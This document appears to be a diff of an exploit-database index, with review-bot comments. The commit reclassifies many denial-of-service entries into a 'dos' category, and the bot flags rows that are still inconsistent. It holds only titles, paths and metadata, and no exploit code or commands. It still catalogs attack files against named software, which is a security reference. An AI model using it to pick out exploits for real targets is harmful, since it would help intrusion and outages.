+21653,platforms/windows/dos/21653.c,"KaZaA Media Desktop 1.7.1 - Large Message Denial of Service Vulnerability",2002-07-25,"Josh and omega",windows,dos,0
 21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 Web Messaging HTTP Get Buffer Overflow Vulnerability",2002-07-25,anonymous,windows,remote,0
 21655,platforms/hardware/dos/21655.c,"Cisco IOS 11.x - TFTP Server Long File Name Buffer Overflow Vulnerability",2002-07-26,FX,hardware,dos,0
 21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router Long HTTP Request DoS",2002-07-27,FX,hardware,dos,0
@@ -18968,7 +18968,7 @@ id,file,description,date,author,platform,type,port
 21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0
 21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6_Konqueror 2.2.2/3.0_Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0
 21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability",2002-08-06,"Dave Aitel",windows,remote,0
-21694,platforms/windows/remote/21694.pl,"602Pro LAN SUITE 2002 Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,remote,0
+21694,platforms/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,dos,0
 21695,platforms/windows/remote/21695.pl,"Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (1)",2002-08-08,"Paul Szabo",windows,remote,0
 21696,platforms/windows/remote/21696.pl,"Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (2)",2002-08-08,"Paul Szabo",windows,remote,0
 21697,platforms/windows/remote/21697.txt,"Apache 2.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-09,"Auriemma Luigi",windows,remote,0
@@ -19333,7 +19333,7 @@ id,file,description,date,author,platform,type,port
 22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS Vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0
 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0
-22074,platforms/osx/local/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,local,0
+22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta ViewTopic.PHP Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0
 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0
 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0
@@ -19362,12 +19362,12 @@ id,file,description,date,author,platform,type,port
 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0
 22103,platforms/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps,0
 22104,platforms/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 HTML Injection Vulnerability",2002-12-16,"Pedram Amini",php,webapps,0
-22105,platforms/linux/local/22105.c,"Linux Kernel 2.2 - mmap() Local Denial of Service Vulnerability",2002-12-17,"Michal Zalewski",linux,local,0
+22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - mmap() Local Denial of Service Vulnerability",2002-12-17,"Michal Zalewski",linux,dos,0
 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x Negative Length HTTP Header Vulnerability",2002-12-19,iDefense,linux,remote,0
 22107,platforms/php/webapps/22107.txt,"SPGPartenaires 3.0.1 ident.php SQL Injection",2002-12-20,frog,php,webapps,0
 22108,platforms/php/webapps/22108.txt,"SPGPartenaires 3.0.1 delete.php SQL Injection",2002-12-20,frog,php,webapps,0
 22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 EditForm.PHP Cross-Site Scripting Vulnerability",2002-12-22,xatr0z,php,webapps,0
-22110,platforms/php/webapps/22110.txt,"PHP-Nuke 6.0 Modules.PHP Denial of Service Vulnerability",2002-12-23,"Ing. Bernardo Lopez",php,webapps,0
+22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - Modules.PHP Denial of Service Vulnerability",2002-12-23,"Ing. Bernardo Lopez",php,dos,0
 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 Shadow File Disclosure Vulnerability",2002-12-22,"Victor Pereira",cgi,webapps,0
 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 Information Disclosure Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0
 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0
@@ -19743,7 +19743,7 @@ id,file,description,date,author,platform,type,port
 22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 script.php Remote Command Execution Vulnerability",2003-03-31,"DWC Gr0up",php,webapps,0
 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0
 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0
-22494,platforms/php/webapps/22494.txt,"OSCommerce 2.2 Product_Info.PHP Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
+22494,platforms/php/dos/22494.txt,"OSCommerce 2.2 - Product_Info.PHP Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0
 22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 Documentation Server Error Page Cross-Site Scripting Vulnerability",2003-04-15,euronymous,multiple,remote,0
 22497,platforms/multiple/remote/22497.txt,"12Planet Chat Server 2.5 Error Message Installation Path Disclosure Vulnerability",2003-04-11,"Dennis Rand",multiple,remote,0
 22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
@@ -19752,7 +19752,7 @@ id,file,description,date,author,platform,type,port
 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service Vulnerability (1)",2003-04-15,badpack3t,multiple,dos,0
 22503,platforms/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service Vulnerability (2)",2003-04-16,"Shashank pandey",multiple,dos,0
 22504,platforms/windows/remote/22504.txt,"Cerberus FTP Server 2.1 Information Disclosure Weakness",2003-04-16,"Ziv Kamir",windows,remote,0
-22505,platforms/multiple/remote/22505.txt,"Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability",2003-04-16,zillion,multiple,remote,0
+22505,platforms/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - NULL Pointer Dereference Denial of Service Vulnerability",2003-04-16,zillion,multiple,dos,0
 22506,platforms/windows/remote/22506.txt,"EZ Server 1.0 File Disclosure Vulnerability",2003-04-17,"gregory Le Bras",windows,remote,0
 22507,platforms/asp/webapps/22507.txt,"Web Wiz Forum 6.34 Information Disclosure Vulnerability",2003-04-17,"Uziel aka nuJIurpuM",asp,webapps,0
 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x Rejected Connection Memory Leakage Denial of Service Vulnerability",2003-04-18,"Steve Grubb",linux,dos,0
@@ -19904,7 +19904,7 @@ id,file,description,date,author,platform,type,port
 22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,metasploit,multiple,remote,0
 22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow Vulnerability (1)",2003-05-26,wsxz,linux,remote,0
 22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow Vulnerability (2)",2003-05-26,jsk,linux,remote,0
-22660,platforms/php/webapps/22660.txt,"PostNuke Phoenix 0.72x Rating System Denial of Service Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0
+22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0
 22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 Command Line Argument Buffer Overflow Vulnerability",2003-05-27,"Gino Thomas",freebsd,local,0
 22662,platforms/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 HTML Attachment Cross-Site Scripting Vulnerability",2003-05-27,KernelPanikLabs,multiple,remote,0
 22663,platforms/php/webapps/22663.txt,"Newsscript 1.0 Administrative Privilege Elevation Vulnerability",2003-05-27,"Peter Winter-Smith",php,webapps,0
@@ -19914,7 +19914,7 @@ id,file,description,date,author,platform,type,port
 22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 POP3 Server Denial of Service Vulnerability",2003-05-28,"Ziv Kamir",windows,dos,0
 22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 SMTP Server Command Buffer Overflow Vulnerability",2003-05-28,"Ziv Kamir",windows,dos,0
 22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting Vulnerability",2003-05-28,"silent needel",cgi,webapps,0
-22670,platforms/windows/remote/22670.c,"Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability",2003-05-28,Neo1,windows,remote,0
+22670,platforms/windows/remote/22670.c,"Microsoft IIS 5 WebDAV - PROPFIND and SEARCH Method Denial of Service Vulnerability",2003-05-28,Neo1,windows,remote,0
 22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 URI Parameter File Disclosure Vulnerability",2003-05-29,pokleyzz,php,webapps,0
 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Include Vulnerability",2003-05-29,pokleyzz,php,webapps,0
 22673,platforms/asp/webapps/22673.txt,"Philboard 1.14 philboard_admin.ASP Authentication Bypass Vulnerability",2003-05-29,aresu@bosen.net,asp,webapps,0
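Review bot: Row 22670 is left under `platforms/windows/remote/22670.c` with type `remote` even though its description is a Denial of Service, while every other DoS-titled row this commit touches (21305–21307, 21653, 21694, 24211, 24634–24637 and the rest) is relocated to `dos`; this hunk only inserts the ` - ` separator. If 22670.c merely crashes IIS 5 through PROPFIND/SEARCH, the row should become `22670,platforms/windows/dos/22670.c,"Microsoft IIS 5 WebDAV - PROPFIND and SEARCH Method Denial of Service Vulnerability",2003-05-28,Neo1,windows,dos,0` and the file moved with it. If the PoC actually reaches code execution through the WebDAV overflow, then it is the description, not the type, that is wrong. I cannot tell which from the index alone, so please check the file before leaving this row as the one outlier.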
@@ -20456,7 +20456,7 @@ id,file,description,date,author,platform,type,port
 23228,platforms/linux/local/23228.c,"SLocate 2.6 User-Supplied Database Heap Overflow Vulnerability",2003-10-06,"Patrik Hornik",linux,local,0
 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability",2003-10-07,DaveK,windows,remote,0
 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 postURL/getURL Restriction Bypass Vulnerability",2003-10-07,"GreyMagic Software",multiple,remote,0
-23231,platforms/multiple/remote/23231.txt,"Medieval Total War 1.0/1.1 nickname Denial of Service Vulnerability",2003-10-07,"Luigi Auriemma",multiple,remote,0
+23231,platforms/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service Vulnerability",2003-10-07,"Luigi Auriemma",multiple,dos,0
 23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Include Vulnerability",2003-10-08,"Zone-h Security Team",php,webapps,0
 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x HTML Injection Vulnerabilities",2003-10-08,Jelmer,php,webapps,0
 23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service Vulnerability",2003-10-08,I2S-LaB,windows,dos,0
@@ -20538,7 +20538,7 @@ id,file,description,date,author,platform,type,port
 23308,platforms/linux/local/23308.c,"kpopup 0.9.x Privileged Command Execution Vulnerability",2003-10-28,b0f,linux,local,0
 23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass 7.1 HTTP Server Directory Disclosure Vulnerability",2003-10-28,"Richard Maudsley",multiple,remote,0
 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 HTTP Referer Remote Buffer Overflow Vulnerability",2003-10-29,"Oliver Karow",windows,dos,0
-23311,platforms/php/webapps/23311.txt,"E107 Chatbox.php Denial of Service Vulnerability",2003-10-29,Blademaster,php,webapps,0
+23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service Vulnerability",2003-10-29,Blademaster,php,dos,0
 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation Vulnerability",2003-10-30,"Corsaire Limited",cgi,remote,0
 23315,platforms/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability",2003-10-31,"Corsaire Limited",jsp,webapps,0
 23316,platforms/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting Vulnerability",2003-10-31,"Andy Davis",windows,remote,0
@@ -20594,7 +20594,7 @@ id,file,description,date,author,platform,type,port
 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 Privilege Escalation Vulnerability",2003-11-08,"Knud Erik Hojgaard",linux,local,0
 23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal Vulnerability",2003-11-10,nimber@designer.ru,windows,remote,0
 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x CTCP Nickname Server Message Buffer Overrun Vulnerability",2003-11-10,Li0n7,linux,remote,0
-23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 DoSe.pl Remote Command Execution Vulnerability",2003-11-10,Don_Huan,cgi,webapps,0
+23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - DoSe.pl Remote Command Execution Vulnerability",2003-11-10,Don_Huan,cgi,webapps,0
 23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (1)",2003-11-10,demz,linux,remote,0
 23369,platforms/linux/remote/23369.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (2)",2003-11-10,Li0n7,linux,remote,0
 23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal Vulnerability",2003-11-10,"Beck Mr.R",cgi,webapps,0
@@ -20676,7 +20676,7 @@ id,file,description,date,author,platform,type,port
 23457,platforms/php/webapps/23457.txt,"BES-CMS 0.4/0.5 folder.php File Include Vulnerability",2003-12-20,frog,php,webapps,0
 23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 hacking.php File Include Vulnerability",2003-12-20,frog,php,webapps,0
 23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5.1 - MyLinks Myheader.php Cross-Site Scripting Vulnerability",2003-12-21,"Chintan Trivedi",php,webapps,0
-23460,platforms/php/webapps/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service Vulnerability",2003-12-22,"Peter Winter-Smith",php,webapps,0
+23460,platforms/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service Vulnerability",2003-12-22,"Peter Winter-Smith",php,dos,0
 23461,platforms/windows/remote/23461.txt,"dcam webcam server personal Web server 8.2.5 - Directory Traversal Vulnerability",2003-12-22,"Luigi Auriemma",windows,remote,0
 23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 products_id URI Parameter SQL Injection Vulnerability",2003-12-22,JeiAr,php,webapps,0
 23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 manufacturers_id Parameter Cross-Site Scripting Vulnerability",2003-12-22,JeiAr,php,webapps,0
@@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port
 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 BBcode align Tag XSS",2004-02-23,"Janek Vind",php,webapps,0
 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0
 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 CSS HTML Injection Vulnerability",2004-02-23,"Michael Scovetta",php,webapps,0
-23750,platforms/php/webapps/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service Vulnerability",2004-02-24,"Zone-h Security Team",php,webapps,0
+23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service Vulnerability",2004-02-24,"Zone-h Security Team",php,dos,0
 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal Vulnerability",2004-02-24,"Jeremy Bae",windows,remote,0
 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",windows,dos,0
 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 phptest.php Path Disclosure Vulnerability",2004-02-24,"Rafel Ivgi",php,webapps,0
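Review bot: Row 23750 keeps platform `php` and is now filed under `platforms/php/dos/`, yet its description names RobotFTP Server, an FTP daemon rather than a PHP web application, so the type is corrected but the platform column that made the original `webapps` filing look plausible is carried over unchanged. If the advisory targets the Windows server binary, the row should read `23750,platforms/windows/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service Vulnerability",2004-02-24,"Zone-h Security Team",windows,dos,0`, the way the neighbouring 23752 DoS row is filed, with the file moved to match. I cannot verify the target platform from the index alone, so confirm it against the advisory text before relocating.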
@@ -21272,7 +21272,7 @@ id,file,description,date,author,platform,type,port
 24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
 24076,platforms/windows/remote/24076.txt,"Sambar 5.x Open Proxy and Authentication Bypass Vulnerability",2003-01-30,"David Endler",windows,remote,0
 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability",2004-05-03,"Imperva Application Defense Center",windows,remote,0
-24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch - Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0
+24078,platforms/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,dos,0
 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String Vulnerability",2004-05-03,"Nilanjan De",linux,remote,0
 24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 LIST Denial of Service Vulnerability",2004-05-04,storm,windows,dos,0
 24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 AddUser.CFM Administrator Command Execution Vulnerability",2004-05-05,"Stuart Jamieson",cfm,webapps,0
@@ -21374,7 +21374,7 @@ id,file,description,date,author,platform,type,port
 24178,platforms/windows/dos/24178.txt,"ToCA Race Driver Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos,0
 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure Vulnerability",2004-06-08,"Vickenty Fesunov",linux,remote,0
 24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection Vulnerability",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0
-24181,platforms/openbsd/remote/24181.sh,"OpenBSD 3.x ISAKMPD Security Association Piggyback Delete Payload Denial of Service Vulnerability",2004-06-08,"Thomas Walpuski",openbsd,remote,0
+24181,platforms/openbsd/dos/24181.sh,"OpenBSD 3.x - ISAKMPD Security Association Piggyback Delete Payload Denial of Service Vulnerability",2004-06-08,"Thomas Walpuski",openbsd,dos,0
 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0
 24183,platforms/php/webapps/24183.txt,"cPanel 5-9 Passwd Remote SQL Injection Vulnerability",2004-06-09,verb0s@virtualnova.net,php,webapps,0
 24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 Access Validation Vulnerability",2004-06-09,"Thomas Ryan",asp,webapps,0
@@ -21382,7 +21382,7 @@ id,file,description,date,author,platform,type,port
 24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module categories Parameter XSS",2004-06-11,"Janek Vind",java,webapps,0
 24191,platforms/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia Module Multiple Function XSS",2004-06-11,"Janek Vind",php,webapps,0
 24192,platforms/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module order Parameter SQL Injection",2004-06-11,"Janek Vind",php,webapps,0
-24193,platforms/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x Score Subsystem score Variable DoS",2004-06-11,"Janek Vind",php,webapps,0
+24193,platforms/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0
 24194,platforms/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module Multiple Parameter XSS",2004-06-11,"Janek Vind",php,webapps,0
 24195,platforms/windows/dos/24195.pl,"WinAgents TFTP Server 3.0 - Remote Buffer Overrun Vulnerability",2004-06-11,"Ziv Kamir",windows,dos,0
 24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 URI Obfuscation Weakness",2004-06-14,http-equiv,windows,remote,0
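Review bot: The new description for 24193, `PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities`, drops every term that distinguished this row from its siblings 24190–24194 (same author, same date): the Score subsystem, the `score` variable and the DoS outcome, so a search of the index for the PHP-Nuke score DoS no longer hits and the row no longer says which module the file covers. If 24193.txt really documents several issues, keep the specific part in the title, e.g. `"PHP-Nuke 6.x/7.x - Score Subsystem score Variable DoS / Multiple Input Validation Vulnerabilities"`; if it only covers the score DoS, the old wording with just the ` - ` separator added is the better edit. Unrelated to the changed row, context line 24190 files a PHP-Nuke advisory under platform `java`, which looks like the same kind of mis-filing this commit is cleaning up elsewhere.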
@@ -21401,7 +21401,7 @@ id,file,description,date,author,platform,type,port
 24208,platforms/windows/dos/24208.c,"FreeIPS 1.0 Protected Service Denial of Service Vulnerability",2004-06-14,shawnwebb@softhome.net,windows,dos,0
 24209,platforms/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service Vulnerability",2004-06-14,"Tan Chew Keong",windows,dos,0
 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow Vulnerability",2003-03-10,watercloud,hp-ux,local,0
-24211,platforms/windows/remote/24211.txt,"Microsoft Internet Explorer 6.0 HREF Save As Denial of Service Vulnerability",2004-06-15,"Rafel Ivgi The-Insider",windows,remote,0
+24211,platforms/windows/dos/24211.txt,"Microsoft Internet Explorer 6.0 - HREF Save As Denial of Service Vulnerability",2004-06-15,"Rafel Ivgi The-Insider",windows,dos,0
 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.PHP File Include Vulnerability",2004-06-15,loofus,php,webapps,0
 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability",2004-06-15,"bitlance winter",windows,remote,0
 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x Registration_Rules.ASP Cross-Site Scripting Vulnerability",2004-06-15,"Ferruh Mavituna",asp,webapps,0
@@ -21495,7 +21495,7 @@ id,file,description,date,author,platform,type,port
 24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 Cookie Based Authentication System Bypass Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0
 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injection Vulnerabilities",2004-07-21,"Noam Rathaus",php,webapps,0
 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 Server Side Includes Cross-Site Scripting Vulnerability",2004-07-22,"Oliver Karow",windows,remote,0
-24305,platforms/multiple/webapps/24305.txt,"PSCS VPOP3 2.0 Email Server Remote Denial of Service Vulnerability",2004-07-22,dr_insane,multiple,webapps,0
+24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service Vulnerability",2004-07-22,dr_insane,multiple,dos,0
 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module Directory Traversal Vulnerability",2004-07-23,sullo@cirt.net,php,webapps,0
 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x Install Script Administrator Password Disclosure Vulnerability",2004-07-24,hellsink,php,webapps,0
 24308,platforms/multiple/remote/24308.rb,"Java Applet Method Handle Remote Code Execution",2013-01-24,metasploit,multiple,remote,0
@@ -21599,12 +21599,12 @@ id,file,description,date,author,platform,type,port
 24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal Vulnerability",2004-08-24,"Jerome Athias",cgi,webapps,0
 24409,platforms/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x Unauthorized Proxy Relay Vulnerability",2002-12-11,Texonet,windows,remote,0
 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0
-24411,platforms/windows/local/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service Vulnerability",2004-08-25,"Next Generation Security",windows,local,0
+24411,platforms/windows/dos/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service Vulnerability",2004-08-25,"Next Generation Security",windows,dos,0
 24412,platforms/windows/dos/24412.c,"RealVNC Server 4.0 - Remote Denial of Service Vulnerability",2004-08-25,Uz4yh4N,windows,dos,0
 24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 - (.wsz) Remote Code Execution Vulnerability",2004-07-26,anonymous,windows,remote,0
 24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant Vulnerability",2004-08-26,"GulfTech Security",multiple,remote,0
 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0
-24416,platforms/windows/remote/24416.txt,"Ipswitch WS_FTP Server 5.0.x CD Command Malformed File Path Remote Denial of Service Vulnerability",2004-08-30,lion,windows,remote,0
+24416,platforms/windows/dos/24416.txt,"Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service Vulnerability",2004-08-30,lion,windows,dos,0
 24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 test.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0
 24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 
testgetrequest.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0
 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0
@@ -21740,7 +21740,7 @@ id,file,description,date,author,platform,type,port
 24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0
 24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0
 24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0
-24634,platforms/windows/remote/24634.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)",2004-09-27,Coolio,windows,remote,0
+24634,platforms/windows/dos/24634.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)",2004-09-27,Coolio,windows,dos,0
 24578,platforms/osx/local/24578.rb,"Setuid Tunnelblick Privilege Escalation",2013-03-05,metasploit,osx,local,0
 24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,metasploit,osx,local,0
 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service Vulnerability",2013-03-05,"Marc Heuse",windows,dos,0
@@ -21773,7 +21773,7 @@ id,file,description,date,author,platform,type,port
